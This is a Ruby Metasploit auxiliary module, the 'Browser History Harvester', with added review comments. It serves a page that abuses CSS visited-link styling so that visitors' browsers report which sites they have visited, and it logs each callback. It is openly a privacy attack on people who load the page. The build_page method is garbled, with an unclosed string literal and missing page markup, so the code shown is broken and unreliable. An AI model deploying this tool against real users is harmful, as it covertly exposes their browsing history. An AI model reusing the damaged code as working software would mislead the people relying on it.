require 'msf/core'

# Auxiliary module that serves a generated page and records follow-up
# requests made to it. Per its own description the page relies on CSS and HTML
# (no script) so that a browser issues one GET per site in SITELIST that it
# has already visited; the query string of that GET names the site.
#
# NOTE(review): this presumably depends on styling applied to visited links.
# Current mainstream browsers restrict what visited-link styling may do in
# order to close this kind of history leak, so read the module as a record of
# the technique -- confirm before drawing conclusions about a given browser.
#
# For defenders reading proxy or web logs: the callback visible in this code
# is a GET to the serving URI whose query string is the probed site's URL.
class Metasploit3 < Msf::Auxiliary

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module metadata and its single option.
  #
  # SITELIST is declared as not required (the `false` flag) and defaults to
  # data/exploits/capture/http/sites.txt under the framework install root.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Browser History Harvester',
      'Description' => %q{ This module creates a page containing CSS and HTML which will trigger GET requests based on visited sites. This allows an attacker to obtain browser history information without the use of scripting. },
      'License' => MSF_LICENSE,
      'Author' => [ 'Saint Patrick ' ],
      'Version' => '$Revision: 10 $',
      'References' =>
        [
          ['URL','http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/']
        ]
    ))

    register_options(
      [
        OptPath.new('SITELIST', [ false, "The list of URLs that visits will be checked on", File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "sites.txt") ])
      ], self.class)
  end

  # Handles every request to the served URI.
  #
  # A URI containing '?' is treated as a callback: the text after the first
  # '?' is logged as a visited site. Any other URI is treated as the initial
  # page load and gets the page from build_page.
  #
  # The query string is entirely client-controlled. Any client can request
  # "<uri>?<anything>", so a "visited" line in the output is only a claim made
  # by the requester, not proof of browsing history.
  def on_request_uri(cli, request)
    # split on every '?'; only element [1] is used below, so anything after a
    # second '?' in the URI never reaches the log line
    tokenize = request.uri.split('?')

    # Checking to see if this is an initial request or if we should print a host
    if (tokenize.length > 1)
      # drop a single trailing '=' from the query text
      tokenize[1].chomp!('=')
      # NOTE(review): request data is interpolated into console output
      # unchanged -- verify that print_status neutralises control characters
      # before this output is shown on a terminal or written to a log.
      print_status("#{cli.peerhost} visited: #{tokenize[1]}")
      # NOTE(review): the string sits in the argument position that carries the
      # page body in the other branch (send_response(cli, resp)), so this
      # probably sends the status-line text as content rather than an actual
      # 404 status -- confirm against the HttpServer mixin.
      send_response(cli,"HTTP/1.1 404 Not Found\r\n")
    else
      # same caveat as above: request.uri is logged as received
      print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}")
      resp = build_page
      send_response(cli,resp)
      print_status("Sent page to #{cli.peerhost}")
      return
    end
  end

  # Builds the page body from the entries in @list and returns it as a String.
  #
  # NOTE(review): this method is damaged in this copy. The `%Q^` literal below
  # is never closed as written and the markup it should hold is missing,
  # presumably stripped when the listing was extracted. The code is left
  # exactly as found; compare with the upstream module before relying on it.
  def build_page
    @sitecount = 0
    page = %Q^ "
    @sitecount = 0
    @list.each do |site|
      # comment lines are detected before strip!, so a '#' preceded by
      # whitespace is not skipped here
      next if site =~ /^#/
      # strip! edits the String held in @list in place
      site.strip!
      next if site.length == 0
      page << "#{site}
"
      # running count of entries appended to the page
      @sitecount=@sitecount+1
    end
    page << ""
    return page
  end

  # Initialize all things holy
  #
  # Copies the options into instance state, loads the site list once, then
  # hands over to exploit().
  def run
    @sitelist = datastore['SITELIST']
    # NOTE(review): @myuri is not read anywhere in the code visible here; it
    # may have been used by the page template missing from build_page.
    @myuri = datastore['URIPATH']

    # Read here and use as gospel from here on out
    # NOTE(review): SITELIST is registered as optional, so @sitelist may be nil
    # if the default is unset, and a missing or unreadable file is not handled
    # -- File.readlines would raise here; confirm whether that is intended.
    @list = File.readlines(@sitelist)
    exploit()
  end
end